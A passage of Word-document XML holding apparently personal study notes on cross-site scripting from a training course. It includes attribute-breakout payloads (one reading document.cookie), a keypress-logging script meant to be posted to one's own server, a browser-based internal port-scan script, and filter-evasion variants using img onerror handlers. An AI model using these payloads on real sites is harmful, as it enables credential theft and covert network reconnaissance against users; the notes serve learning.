      <w:r>
        <w:t>because of that user control, moving the quotations can have results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9A8FEB" w14:textId="0AA58D66" w:rsidR="00841C8D" w:rsidRDefault="003A68DF" w:rsidP="003A68DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>POC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2E3C0D" w14:textId="1F40EBD6" w:rsidR="003A68DF" w:rsidRDefault="003A68DF" w:rsidP="003A68DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="003A68DF">
        <w:t>test" onmouseover="alert('Hover over the image and inspect the image element')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A420C6" w14:textId="4479D4D9" w:rsidR="003A68DF" w:rsidRDefault="003A68DF" w:rsidP="003A68DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>when entered into URL upload and entered, mousing over the image should create a popup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E75EC7" w14:textId="44B1B972" w:rsidR="003A68DF" w:rsidRDefault="003A68DF" w:rsidP="003A68DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="003A68DF">
        <w:t>xxx" on</w:t>
      </w:r>
      <w:r>
        <w:t>mouseover</w:t>
      </w:r>
      <w:r w:rsidRPr="003A68DF">
        <w:t>="document.body.style.backgroundColor='red'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782B071A" w14:textId="4068ED08" w:rsidR="003A68DF" w:rsidRDefault="003A68DF" w:rsidP="003A68DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>changes background color</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E6743B" w14:textId="0FA6C305" w:rsidR="003A68DF" w:rsidRDefault="003A68DF" w:rsidP="003A68DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>malicious payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5581AB" w14:textId="51159820" w:rsidR="003A68DF" w:rsidRPr="000F0512" w:rsidRDefault="003A68DF" w:rsidP="003A68DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="003A68DF">
        <w:t>xxx" onmouseover="alert(document.cookie)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3098D265" w14:textId="10F27296" w:rsidR="00DC7D6C" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">    XSS Keylogger (http://www.xss-payloads.com/payloads/scripts/simplekeylogger.js.html) - You can log all keystrokes of a user, capturing their password and other sensitive information they type into the webpage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40229831" w14:textId="720A960D" w:rsidR="000272B3" w:rsidRDefault="000272B3" w:rsidP="000272B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>creating events to listen for keypresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB77564" w14:textId="77777777" w:rsidR="000272B3" w:rsidRPr="000272B3" w:rsidRDefault="000272B3" w:rsidP="000272B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000272B3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&lt;script type="text/javascript"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1F6387" w14:textId="77777777" w:rsidR="000272B3" w:rsidRPr="000272B3" w:rsidRDefault="000272B3" w:rsidP="000272B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000272B3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t> let l = ""; // Variable to store key-strokes in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3A28F5" w14:textId="77777777" w:rsidR="000272B3" w:rsidRPr="000272B3" w:rsidRDefault="000272B3" w:rsidP="000272B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000272B3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000272B3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>document.onkeypress = function (e) { // Event to listen for key presses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5141FCAB" w14:textId="77777777" w:rsidR="000272B3" w:rsidRPr="000272B3" w:rsidRDefault="000272B3" w:rsidP="000272B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000272B3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>   l += e.key; // If user types, log it to the l variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8718C4" w14:textId="77777777" w:rsidR="000272B3" w:rsidRPr="000272B3" w:rsidRDefault="000272B3" w:rsidP="000272B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000272B3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>   console.log(l); // update this line to post to your own server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CDFF94" w14:textId="77777777" w:rsidR="000272B3" w:rsidRPr="000272B3" w:rsidRDefault="000272B3" w:rsidP="000272B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000272B3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t> }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2B6577" w14:textId="1A100C2C" w:rsidR="000272B3" w:rsidRPr="000272B3" w:rsidRDefault="000272B3" w:rsidP="000272B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000272B3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AFBA0A" w14:textId="002DFFEE" w:rsidR="000272B3" w:rsidRPr="00F512ED" w:rsidRDefault="00A41239" w:rsidP="000272B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>adapt and check output on logs page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CC29D5" w14:textId="71243496" w:rsidR="00DC7D6C" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">    Port scanning (http://www.xss-payloads.com/payloads/scripts/portscanapi.js.html) - A mini local port scanner (more information on this is covered in the TryHackMe XSS room).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15024718" w14:textId="25AE9C33" w:rsidR="003A68DF" w:rsidRDefault="000272B3" w:rsidP="003A68DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Application layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AB098C" w14:textId="26886A03" w:rsidR="000272B3" w:rsidRDefault="000272B3" w:rsidP="000272B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Browsers do not understand internal/external IP address difference</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A57AC63" w14:textId="5DC07845" w:rsidR="000272B3" w:rsidRDefault="000272B3" w:rsidP="000272B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>any website is able to tell browser to request a resource from internal network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD2E29B" w14:textId="2F0DDF8B" w:rsidR="000272B3" w:rsidRDefault="000272B3" w:rsidP="000272B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>browsers can conduct a basic network scan and infer about existing IPs, hostnames, and services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42459C95" w14:textId="21746BD8" w:rsidR="000272B3" w:rsidRDefault="000272B3" w:rsidP="000272B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The following script will scan an internal network in range 192.168.0.0-192.168.0.255</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398D3A05" w14:textId="77777777" w:rsidR="000272B3" w:rsidRPr="000272B3" w:rsidRDefault="000272B3" w:rsidP="000272B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000272B3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F7A0A3" w14:textId="77777777" w:rsidR="000272B3" w:rsidRPr="000272B3" w:rsidRDefault="000272B3" w:rsidP="000272B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000272B3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t> for (let i = 0; i &lt; 256; i++) { // This is looping from 0 to 255</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDA90B7" w14:textId="77777777" w:rsidR="000272B3" w:rsidRPr="000272B3" w:rsidRDefault="000272B3" w:rsidP="000272B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000272B3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>  let ip = '192.168.0.' + i // Creates variable for forming IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEE8DED" w14:textId="77777777" w:rsidR="000272B3" w:rsidRPr="000272B3" w:rsidRDefault="000272B3" w:rsidP="000272B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000272B3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>  // Creating an image element, if the resource can load, it logs to the /logs page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC7A7F2" w14:textId="77777777" w:rsidR="000272B3" w:rsidRPr="000272B3" w:rsidRDefault="000272B3" w:rsidP="000272B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000272B3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>  let code = '&lt;img src="http://' + ip + '/favicon.ico" onload="this.onerror=null; this.src=/log/' + ip + '"&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0282C9A8" w14:textId="77777777" w:rsidR="000272B3" w:rsidRPr="000272B3" w:rsidRDefault="000272B3" w:rsidP="000272B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000272B3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>  document.body.innerHTML += code // This is adding the image element to the webpage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7EE43B" w14:textId="77777777" w:rsidR="000272B3" w:rsidRPr="000272B3" w:rsidRDefault="000272B3" w:rsidP="000272B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000272B3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t> }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C34DA5" w14:textId="0A5A0D7F" w:rsidR="000272B3" w:rsidRPr="000272B3" w:rsidRDefault="000272B3" w:rsidP="000272B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="000272B3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC47450" w14:textId="07DDBBB8" w:rsidR="000272B3" w:rsidRDefault="000272B3" w:rsidP="000272B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>After finding a valip IP, use same method and include a port number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607738B1" w14:textId="3BB55A8F" w:rsidR="000272B3" w:rsidRDefault="000272B3" w:rsidP="000272B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>only works with webservers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376003FB" w14:textId="2343062E" w:rsidR="000272B3" w:rsidRDefault="007A6E65" w:rsidP="000272B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId68" w:history="1">
        <w:r w:rsidR="000272B3" w:rsidRPr="00F1758D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/aabeling/portscan</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0435EC16" w14:textId="44EE9C64" w:rsidR="000272B3" w:rsidRPr="00F512ED" w:rsidRDefault="000272B3" w:rsidP="000272B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>port scanning with JS ^^^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406DB29C" w14:textId="7FBFEC8D" w:rsidR="00DC7D6C" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:lastRenderedPageBreak/>
        <w:t>XSS-Payloads.com (http://www.xss-payloads.com/) is a website that has XSS related Payloads, Tools, Documentation and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E2EC0B" w14:textId="3AF6A69D" w:rsidR="00A41239" w:rsidRDefault="00A41239" w:rsidP="00A41239">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Filter Evasion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2362B3D2" w14:textId="5456EB3E" w:rsidR="00A41239" w:rsidRDefault="00A41239" w:rsidP="00A41239">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>bypass filter that removes &lt;script&gt; tags?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258B86D0" w14:textId="5A8EE978" w:rsidR="00A41239" w:rsidRDefault="00A41239" w:rsidP="00A41239">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use img tag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379F823A" w14:textId="3B77FDA1" w:rsidR="00A41239" w:rsidRDefault="00A41239" w:rsidP="00A41239">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex .</w:t>
      </w:r>
      <w:r w:rsidRPr="00A41239">
        <w:t xml:space="preserve"> &lt;img src="blah" onerror=alert("Hello") /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0549D2EC" w14:textId="194318CE" w:rsidR="00A41239" w:rsidRDefault="00A41239" w:rsidP="00A41239">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>replace onerror with onmouseover or onhover</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5117B4ED" w14:textId="2E6D9064" w:rsidR="00A41239" w:rsidRDefault="00A41239" w:rsidP="00A41239">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>bypass filter that removes “alert”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4912E9" w14:textId="19F383DE" w:rsidR="00A41239" w:rsidRDefault="00A41239" w:rsidP="00A41239">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>check site source code for specific predefined methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E16A2E8" w14:textId="727E4E60" w:rsidR="00A41239" w:rsidRDefault="00A41239" w:rsidP="00A41239">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>source code may commonly use “prompt” and “confirm”, among others</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7291BFD1" w14:textId="3A453E52" w:rsidR="00A41239" w:rsidRDefault="00A41239" w:rsidP="00A41239">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A41239">
        <w:t>&lt;img src="blah" onerror=confirm("Hello") /&gt;</w:t>
      </w:r>
    </w:p>
